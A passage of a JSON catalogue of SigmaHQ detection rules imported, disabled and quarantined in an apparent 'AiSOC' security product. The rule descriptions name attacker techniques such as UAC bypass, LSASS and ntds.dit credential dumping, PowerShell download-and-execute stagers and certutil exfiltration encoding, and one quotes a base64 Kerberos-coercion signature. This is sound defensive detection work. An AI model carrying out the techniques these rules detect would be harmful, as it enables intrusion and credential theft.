"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml" } }, { "id": "sigmahq-sigma-e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", "type": "detection", "name": "Nohup Execution", "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/nohup-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_nohup.yml" } }, { "id": "sigmahq-sigma-e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "type": "detection", "name": "UAC Bypass via Windows Firewall Snap-In Hijack", "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-via-windows-firewall-snap-in-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" } }, { "id": "sigmahq-sigma-e54279c7-4910-4e2c-902c-c56a25b549f6", "type": "detection", "name": "Windows AppX Deployment Full Trust Package Installation", "description": "Detects the installation of MSIX/AppX packages with full trust privileges which run with elevated privileges outside normal AppX container restrictions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1553.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-appx-deployment-full-trust-package-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e54279c7-4910-4e2c-902c-c56a25b549f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxpackaging_server_full_trust_package_installation.yml" } }, { "id": "sigmahq-sigma-e54979bd-c5f9-4d6c-967b-a04b19ac4c74", "type": "detection", "name": "Uncommon Outbound Kerberos Connection", "description": "Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558", "T1550.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-outbound-kerberos-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml" } }, { "id": "sigmahq-sigma-e54f5149-6ba3-49cf-b153-070d24679126", "type": "detection", "name": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-obfuscation-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e54f5149-6ba3-49cf-b153-070d24679126", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml" } }, { "id": "sigmahq-sigma-e55a5195-4724-480e-a77e-3ebe64bd3759", "type": "detection", "name": "Invoke-Obfuscation Via Use MSHTA - PowerShell", "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-mshta-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e55a5195-4724-480e-a77e-3ebe64bd3759", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml" } }, { "id": "sigmahq-sigma-e568650b-5dcd-4658-8f34-ded0b1e13992", "type": "detection", "name": "Potential Product Class Reconnaissance Via Wmic.EXE", "description": "Detects the execution of WMIC in order to get a list of firewall, antivirus and antispywware products.\nAdversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms.\nThis information helps them plan their next attack steps and choose appropriate techniques to bypass security measures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-product-class-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e568650b-5dcd-4658-8f34-ded0b1e13992", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_product_class.yml" } }, { "id": "sigmahq-sigma-e56d3073-83ff-4021-90fe-c658e0709e72", "type": "detection", "name": "Gpresult Display Group Policy Information", "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1615" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gpresult-display-group-policy-information.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e56d3073-83ff-4021-90fe-c658e0709e72", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gpresult_execution.yml" } }, { "id": "sigmahq-sigma-e593cf51-88db-4ee1-b920-37e89012a3c9", "type": "detection", "name": "Potentially Suspicious Rundll32 Activity", "description": "Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-rundll32-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e593cf51-88db-4ee1-b920-37e89012a3c9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml" } }, { "id": "sigmahq-sigma-e5ac86dd-2da1-454b-be74-05d26c769d7d", "type": "detection", "name": "Windows Default Domain GPO Modification", "description": "Detects modifications to Default Domain or Default Domain Controllers Group Policy Objects (GPOs).\nAdversaries may modify these default GPOs to deploy malicious configurations across the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-default-domain-gpo-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e5ac86dd-2da1-454b-be74-05d26c769d7d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_default_domain_gpo_modification.yml" } }, { "id": "sigmahq-sigma-e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "type": "detection", "name": "Credential Dumping Attempt Via WerFault", "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credential-dumping-attempt-via-werfault.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_werfault.yml" } }, { "id": "sigmahq-sigma-e5d36acd-acb4-4c6f-a13f-9eb203d50099", "type": "detection", "name": "Active Directory Structure Export Via Csvde.EXE", "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-structure-export-via-csvde-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_csvde_export.yml" } }, { "id": "sigmahq-sigma-e5f5c693-52d7-4de5-88ae-afbfbce85595", "type": "detection", "name": "Unsigned .node File Loaded", "description": "Detects the loading of unsigned .node files.\nAdversaries may abuse a lack of .node integrity checking to execute arbitrary code inside of trusted applications such as Slack.\n.node files are native add-ons for Electron-based applications, which are commonly used for desktop applications like Slack, Discord, and Visual Studio Code.\nThis technique has been observed in the DripLoader malware, which uses unsigned .node files to load malicious native code into Electron applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1129", "T1574.001", "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-node-file-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e5f5c693-52d7-4de5-88ae-afbfbce85595", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_unsigned_node_load.yml" } }, { "id": "sigmahq-sigma-e61e8a88-59a9-451c-874e-70fcc9740d67", "type": "detection", "name": "New DNS ServerLevelPluginDll Installed", "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-dns-serverlevelplugindll-installed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e61e8a88-59a9-451c-874e-70fcc9740d67", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml" } }, { "id": "sigmahq-sigma-e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", "type": "detection", "name": "File Encoded To Base64 Via Certutil.EXE", "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-encoded-to-base64-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_encode.yml" } }, { "id": "sigmahq-sigma-e6313acd-208c-44fc-a0ff-db85d572e90e", "type": "detection", "name": "Network Reconnaissance Activity", "description": "Detects a set of suspicious network related commands often used in recon stages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087", "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-reconnaissance-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_nslookup_domain_discovery.yml" } }, { "id": "sigmahq-sigma-e6474a1b-5390-49cd-ab41-8d88655f7394", "type": "detection", "name": "Renamed Mavinject.EXE Execution", "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055.001", "T1218.013" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-mavinject-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e6474a1b-5390-49cd-ab41-8d88655f7394", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" } }, { "id": "sigmahq-sigma-e66779cc-383e-4224-a3a4-267eeb585c40", "type": "detection", "name": "Bypass UAC via CMSTP", "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002", "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bypass-uac-via-cmstp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e66779cc-383e-4224-a3a4-267eeb585c40", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" } }, { "id": "sigmahq-sigma-e6c54d94-498c-4562-a37c-b469d8e9a275", "type": "detection", "name": "Suspicious PowerShell Download and Execute Pattern", "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-download-and-execute-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e6c54d94-498c-4562-a37c-b469d8e9a275", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml" } }, { "id": "sigmahq-sigma-e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "type": "detection", "name": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-rundll-launcher-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml" } }, { "id": "sigmahq-sigma-e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "type": "detection", "name": "VBA DLL Loaded Via Office Application", "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vba-dll-loaded-via-office-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_office_vbadll_load.yml" } }, { "id": "sigmahq-sigma-e6e88853-5f20-4c4a-8d26-cd469fd8d31f", "type": "detection", "name": "Ntdsutil Abuse", "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntdsutil-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse.yml" } }, { "id": "sigmahq-sigma-e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "type": "detection", "name": "Potential Persistence Via AutodialDLL", "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-autodialdll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" } }, { "id": "sigmahq-sigma-e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", "type": "detection", "name": "Suspicious OpenSSH Daemon Error", "description": "Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-openssh-daemon-error.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml" } }, { "id": "sigmahq-sigma-e76c8240-d68f-4773-8880-5c6f63595aaf", "type": "detection", "name": "Time Travel Debugging Utility Usage - Image", "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/time-travel-debugging-utility-usage-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e76c8240-d68f-4773-8880-5c6f63595aaf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_tttracer_module_load.yml" } }, { "id": "sigmahq-sigma-e76ca062-4de0-4d79-8d90-160a0d335eca", "type": "detection", "name": "PUA - Kernel Driver Utility (KDU) Execution", "description": "Detects execution of the Kernel Driver Utility (KDU) tool.\nKDU can be used to bypass driver signature enforcement and load unsigned or malicious drivers into the Windows kernel.\nPotentially allowing for privilege escalation, persistence, or evasion of security controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-kernel-driver-utility-kdu-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e76ca062-4de0-4d79-8d90-160a0d335eca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool.yml" } }, { "id": "sigmahq-sigma-e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "type": "detection", "name": "Dllhost.EXE Execution Anomaly", "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dllhost-exe-execution-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dllhost_no_cli_execution.yml" } }, { "id": "sigmahq-sigma-e78c408a-e2ea-43cd-b5ea-51975cf358c0", "type": "detection", "name": "Disable Windows Firewall by Registry", "description": "Detect set EnableFirewall to 0 to disable the Windows firewall", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-windows-firewall-by-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml" } }, { "id": "sigmahq-sigma-e7a21b5f-d8c4-4ae5-b8d9-93c5d3f28e1c", "type": "detection", "name": "Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing", "description": "Detects DNS queries containing patterns associated with Kerberos coercion attacks via DNS object spoofing.\nThe pattern \"1UWhRCAAAAA..BAAAA\" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.\nAttackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.\nIt is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records\nto spoof Service Principal Names (SPNs) and redirect authentication requests like CVE-2025-33073.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.001", "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dns-query-indicating-kerberos-coercion-via-dns-object-spn-spoofing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e7a21b5f-d8c4-4ae5-b8d9-93c5d3f28e1c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_kerberos_coercion_via_dns_object_spoofing.yml" } }, { "id": "sigmahq-sigma-e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", "type": "detection", "name": "System Scripts Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": 